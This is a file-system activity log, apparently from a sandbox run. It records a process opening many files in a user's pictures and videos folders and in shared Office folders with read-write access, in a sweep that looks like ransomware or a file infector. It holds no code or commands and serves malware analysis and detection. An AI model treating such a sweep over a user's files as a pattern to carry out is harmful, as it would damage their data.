Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\zu1 _on\QaUjhe\rGw15KQUy_H3LYwN5\4haF6sPbyW_.gif	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\zu1 _on\QaUjhe\rGw15KQUy_H3LYwN5\8B9CArYYR-k5_6.jpg	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\zu1 _on\QaUjhe\rGw15KQUy_H3LYwN5\k-DDYba4e9vKH.png	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\zu1 _on\QaUjhe\rGw15KQUy_H3LYwN5\ni-jXUyMmKeOU4Zi2aIU.png	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\zu1 _on\ubh3Kx_A\rtYIqoqrRvq.bmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\zu1 _on\ubh3Kx_A\_NTc8TO6LpPJ5zXjg.gif	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\zu1 _on\xsTHwcnuDqWQ9Jfwv\5NOeuuWGic W5vSvZ.png	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\zu1 _on\xsTHwcnuDqWQ9Jfwv\RCe6gFP9n8QcDK.gif	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\zu1 _on\xsTHwcnuDqWQ9Jfwv\u8Rrvn5zJ.jpg	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Saved Games\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Searches\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Searches\Everywhere.search-ms	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\8HC y_m_mnm8.swf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\8oeI6XU5 vjIz.avi	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\EXInUgGRa8IXEf\-x3FnD.avi	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\EXInUgGRa8IXEf\3w7z.flv	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\EXInUgGRa8IXEf\baHs2DdbqE.swf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\EXInUgGRa8IXEf\BflhCY_h.mp4	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\EXInUgGRa8IXEf\CrDx78k.mkv	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\EXInUgGRa8IXEf\ni0Jgy12uVbTOlRR.mkv	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\EXInUgGRa8IXEf\O89VrUgck0WGUK_Y\8RjZdKR.avi	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\EXInUgGRa8IXEf\O89VrUgck0WGUK_Y\g1B3M3.avi	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\EXInUgGRa8IXEf\O89VrUgck0WGUK_Y\Hq-306b65BqrHoqbR9.swf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\EXInUgGRa8IXEf\O89VrUgck0WGUK_Y\Hz-AF2m p5AxcZJOR.mkv	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\EXInUgGRa8IXEf\O89VrUgck0WGUK_Y\kpXaWD.mp4	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\EXInUgGRa8IXEf\q93T.avi	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\EXInUgGRa8IXEf\qRUUXSSNmlOJdjR 6U.flv	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\EXInUgGRa8IXEf\QVNDMBKO6iJXOO2h3\5EP3zi8p1_ R.mkv	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\EXInUgGRa8IXEf\QVNDMBKO6iJXOO2h3\6R9e9hJWmT-aPrPe.avi	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\EXInUgGRa8IXEf\QVNDMBKO6iJXOO2h3\hCecQC2.mp4	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\EXInUgGRa8IXEf\QVNDMBKO6iJXOO2h3\kuUk4.swf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\EXInUgGRa8IXEf\QVNDMBKO6iJXOO2h3\l414QV7S1.swf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\EXInUgGRa8IXEf\QVNDMBKO6iJXOO2h3\LcNIbb5Xdpy1cT0Voq.flv	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\EXInUgGRa8IXEf\QVNDMBKO6iJXOO2h3\xjB5_nJ6.flv	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\EXInUgGRa8IXEf\rRaXTMp.mkv	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\EXInUgGRa8IXEf\Vynkb.flv	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\fpsQYKF MOi0MA.flv	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\hjEoNe.swf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\laJ7 XG6mvY9a4Oq.mp4	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\LB1Vquw6 amP SWGL3zs.flv	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\mF_q7P7.swf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\OaJupVjMV.mkv	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\PSzsrL7.avi	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ztTnKYuZ\f 1Medb.mp4	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ztTnKYuZ\JAPSpnBZPTk8W3utGB.flv	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ztTnKYuZ\SXoi3O7UHlm4-KqaOQbg.avi	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ztTnKYuZ\Tloxb4BEF.swf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ztTnKYuZ\wKKlBy5ZmIsI.flv	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Adobe\Acrobat\10.0\Replicate\Security\directories.acrodata	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Assistance\Client\1.0\en-US\Help_MKWD_AssetId.H1W	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Assistance\Client\1.0\en-US\Help_MKWD_BestBet.H1W	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Assistance\Client\1.0\en-US\Help_MTOC_help.H1H	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Assistance\Client\1.0\en-US\Help_MValidator.H1D	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Assistance\Client\1.0\en-US\Help_MValidator.Lck	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Assistance\Client\1.0\en-US\Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\IdentityCRL\ppcrlui.dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\MF\Active.GRL	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\MF\Pending.GRL	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Network\Downloader\qmgr0.dat	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Network\Downloader\qmgr1.dat	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\OFFICE\AssetLibrary.ico	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\OFFICE\DocumentRepository.ico	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\OFFICE\MySharePoints.ico	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\OFFICE\MySite.ico	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\OFFICE\SharePointPortalSite.ico	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\OFFICE\SharePointTeamSite.ico	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\OFFICE\UICaptions\1036\ENVELOPR.DLL.trx_dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\OFFICE\UICaptions\1036\GRINTL32.DLL.trx_dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\OFFICE\UICaptions\1036\GRINTL32.REST.trx_dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\OFFICE\UICaptions\1036\MAPIR.DLL.trx_dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\OFFICE\UICaptions\1036\MOR6INT.REST.trx_dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\OFFICE\UICaptions\1036\MSOINTL.DLL.trx_dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\OFFICE\UICaptions\1036\MSOINTL.REST.trx_dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\OFFICE\UICaptions\1036\OMSINTL.DLL.trx_dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\OFFICE\UICaptions\1036\ONINTL.DLL.trx_dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\OFFICE\UICaptions\1036\ONINTL.REST.trx_dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\OFFICE\UICaptions\1036\OUTLLIBR.DLL.trx_dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\OFFICE\UICaptions\1036\OUTLLIBR.REST.trx_dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\OFFICE\UICaptions\1036\OUTLWVW.DLL.trx_dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\OFFICE\UICaptions\1036\PPINTL.DLL.trx_dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\OFFICE\UICaptions\1036\PPINTL.REST.trx_dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\OFFICE\UICaptions\1036\PUB6INTL.DLL.trx_dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\OFFICE\UICaptions\1036\PUB6INTL.REST.trx_dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\OFFICE\UICaptions\1036\PUBWZINT.REST.trx_dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\OFFICE\UICaptions\1036\SGRES.DLL.trx_dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\OFFICE\UICaptions\1036\STINTL.DLL.trx_dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\OFFICE\UICaptions\1036\VISBRRES.DLL.trx_dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\OFFICE\UICaptions\1036\VISINTL.DLL.trx_dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\OFFICE\UICaptions\1036\WWINTL.DLL.trx_dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\OFFICE\UICaptions\1036\WWINTL.REST.trx_dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\OFFICE\UICaptions\1036\XLINTL32.DLL.trx_dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\OFFICE\UICaptions\1036\XLINTL32.REST.trx_dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\OFFICE\UICaptions\1036\XLSLICER.DLL.trx_dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\OFFICE\UICaptions\3082\ENVELOPR.DLL.trx_dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\OFFICE\UICaptions\3082\GRINTL32.DLL.trx_dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\OFFICE\UICaptions\3082\GRINTL32.REST.trx_dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\OFFICE\UICaptions\3082\MAPIR.DLL.trx_dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\OFFICE\UICaptions\3082\MOR6INT.REST.trx_dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\OFFICE\UICaptions\3082\MSOINTL.DLL.trx_dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\OFFICE\UICaptions\3082\MSOINTL.REST.trx_dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\OFFICE\UICaptions\3082\OMSINTL.DLL.trx_dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\OFFICE\UICaptions\3082\ONINTL.DLL.trx_dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\OFFICE\UICaptions\3082\ONINTL.REST.trx_dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\OFFICE\UICaptions\3082\OUTLLIBR.DLL.trx_dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\OFFICE\UICaptions\3082\OUTLLIBR.REST.trx_dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\OFFICE\UICaptions\3082\OUTLWVW.DLL.trx_dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\OFFICE\UICaptions\3082\PPINTL.DLL.trx_dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\OFFICE\UICaptions\3082\PPINTL.REST.trx_dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\OFFICE\UICaptions\3082\PUB6INTL.DLL.trx_dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\OFFICE\UICaptions\3082\PUB6INTL.REST.trx_dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\OFFICE\UICaptions\3082\PUBWZINT.REST.trx_dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\OFFICE\UICaptions\3082\SGRES.DLL.trx_dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\OFFICE\UICaptions\3082\STINTL.DLL.trx_dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\OFFICE\UICaptions\3082\VISBRRES.DLL.trx_dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
